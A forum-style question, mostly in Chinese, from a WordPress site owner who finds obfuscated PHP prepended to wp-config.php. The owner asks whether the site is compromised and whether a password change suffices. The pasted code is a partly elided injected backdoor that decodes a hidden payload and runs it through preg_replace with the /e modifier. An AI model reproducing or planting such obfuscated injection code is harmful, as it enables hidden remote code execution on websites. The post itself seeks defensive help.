我没有意识到我的一个WP站点在过去的几个月里没有被访问,因此没有更新,今天我发现config.php 文件开头有一些垃圾:
<?php $uqnrguvics = \'x7825r% ... more garbage ...
825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y3/(.*)/epreg_replacezrxmuexghf\';
$uvozcxjtxg = explode(chr((253-209)),\'4137,25,2713,60,8524,67 ... more garbage ...
\'); $tuyrkvuamr=substr($uqnrguvics,(49619-39513),(27-20));
if (!function_exists(\'zpjgeglbtt\')) { function zpjgeglbtt($lwtbhpepkn, $lkvuvnwcsu) {
$sblzyeefjv = NULL; for($mxodybdogx=0;$mxodybdogx<(sizeof($lwtbhpepkn)/2);$mxodybdogx++)
{ $sblzyeefjv .= substr($lkvuvnwcsu, $lwtbhpepkn[($mxodybdogx*2)],
$lwtbhpepkn[($mxodybdogx*2)+1]); }
return $sblzyeefjv; };} $rudmfyfhqb="\\ x20\\57... hex garbage ... \\52\\x2f\\40";
$vkyezvmvec=substr($uqnrguvics,(42452-32339),(65-53));
$vkyezvmvec($tuyrkvuamr, $rudmfyfhqb, NULL); $vkyezvmvec=$rudmfyfhqb;
$vkyezvmvec=(811-690); $uqnrguvics=$vkyezvmvec-1; ?>
<?php
HERE comes an usual wp-config.php, which as far as I remember is the one I had before
该文件也有DOS编码,尽管我在Linux上运行它。
(我已经包括换行符)。
这是否意味着此安装已被破坏?或者这是WP自动包含的东西吗?
如果是,只需更改管理员密码就足够了吗?以管理员身份登录不会显示任何异常。
